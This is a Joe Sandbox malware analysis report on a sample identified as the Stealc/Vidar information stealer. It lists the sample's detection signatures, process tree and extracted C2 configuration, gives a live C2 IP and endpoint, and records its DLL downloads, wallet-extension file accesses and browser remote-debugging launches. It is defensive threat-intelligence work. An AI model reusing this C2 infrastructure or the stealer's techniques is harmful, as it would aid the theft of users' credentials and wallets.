Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
random.exe

Overview

General Information

Sample name:random.exe
Analysis ID:1622965
MD5:847574da42ba3d0640c821e8eb11e286
SHA1:f63a12f36991a1aab0b0cfa89e48ad7138aaac59
SHA256:b730e010dc5deb7b1e33bc057ec8839e99c7943f136f4fe0a20b3a6d4d628202
Tags:exeStealcuser-skocherhan
Infos:

Detection

Stealc, Vidar
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Monitors registry run keys for changes
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • random.exe (PID: 1984 cmdline: "C:\Users\user\Desktop\random.exe" MD5: 847574DA42BA3D0640C821E8EB11E286)
    • chrome.exe (PID: 6772 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 6852 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2128,i,8333296015523379162,13554490080729911822,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • msedge.exe (PID: 7952 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 8184 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2352,i,1975572697325823558,303992249560351608,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 60 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7416 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2176,i,17110791919059724863,15675656893118649044,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.115/c4becf79229cb002.php", "Botnet": "reno"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1458194965.0000000005010000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1871424059.000000000011C000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.1873121673.00000000012BE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.1873121673.00000000012BE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
            00000000.00000002.1871424059.0000000000051000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
              Click to see the 5 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Browser Started with Remote Debugging
              Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\random.exe", ParentImage: C:\Users\user\Desktop\random.exe, ParentProcessId: 1984, ParentProcessName: random.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 6772, ProcessName: chrome.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-24T18:48:29.813610+010020442451Malware Command and Control Activity Detected185.215.113.11580192.168.2.849704TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-24T18:48:29.807113+010020442441Malware Command and Control Activity Detected192.168.2.849704185.215.113.11580TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-24T18:48:30.028434+010020442461Malware Command and Control Activity Detected192.168.2.849704185.215.113.11580TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-24T18:48:31.188951+010020442481Malware Command and Control Activity Detected192.168.2.849704185.215.113.11580TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-24T18:48:30.035888+010020442471Malware Command and Control Activity Detected185.215.113.11580192.168.2.849704TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-24T18:48:29.587190+010020442431Malware Command and Control Activity Detected192.168.2.849704185.215.113.11580TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-24T18:48:31.647519+010028033043Unknown Traffic192.168.2.849704185.215.113.11580TCP
              2025-02-24T18:48:55.729244+010028033043Unknown Traffic192.168.2.849737185.215.113.11580TCP
              2025-02-24T18:48:56.819867+010028033043Unknown Traffic192.168.2.849737185.215.113.11580TCP
              2025-02-24T18:48:57.440985+010028033043Unknown Traffic192.168.2.849737185.215.113.11580TCP
              2025-02-24T18:48:57.968356+010028033043Unknown Traffic192.168.2.849737185.215.113.11580TCP
              2025-02-24T18:48:59.727589+010028033043Unknown Traffic192.168.2.849737185.215.113.11580TCP
              2025-02-24T18:49:00.118721+010028033043Unknown Traffic192.168.2.849737185.215.113.11580TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: random.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.115/68b591d6548ec281/msvcp140.dllbAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.phpIAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.phpEpAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.phpuAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.phpQAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.phpAAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.phpion:Avira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.phpSAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.phpationAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.php6Avira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.phpnfigOverlayAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.php3bAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.phpSxSAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/68b591d6548ec281/softokn3.dll6Avira URL Cloud: Label: malware
              Source: http://185.215.113.115/68b591d6548ec281/freebl3.dllPAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.php9Avira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.phpBrowserAvira URL Cloud: Label: malware
              Found malware configuration
              Source: random.exe.1984.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.215.113.115/c4becf79229cb002.php", "Botnet": "reno"}
              Multi AV Scanner detection for submitted file
              Source: random.exeVirustotal: Detection: 56%Perma Link
              Source: random.exeReversingLabs: Detection: 60%
              Joe Sandbox ML detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA66C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,0_2_6CA66C80
              Source: random.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49733 version: TLS 1.0
              Source: Binary string: mozglue.pdbP source: random.exe, 00000000.00000002.1890959864.000000006CACD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: nss3.pdb@ source: random.exe, 00000000.00000002.1891227308.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
              Source: Binary string: nss3.pdb source: random.exe, 00000000.00000002.1891227308.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: mozglue.pdb source: random.exe, 00000000.00000002.1890959864.000000006CACD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: chrome.exeMemory has grown: Private usage: 1MB later: 38MB

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49704 -> 185.215.113.115:80
              Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.8:49704 -> 185.215.113.115:80
              Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.115:80 -> 192.168.2.8:49704
              Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.8:49704 -> 185.215.113.115:80
              Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.115:80 -> 192.168.2.8:49704
              Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.8:49704 -> 185.215.113.115:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 185.215.113.115/c4becf79229cb002.php
              Source: global trafficTCP traffic: 192.168.2.8:53328 -> 162.159.36.2:53
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 24 Feb 2025 17:48:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 24 Feb 2025 17:48:55 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 24 Feb 2025 17:48:56 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
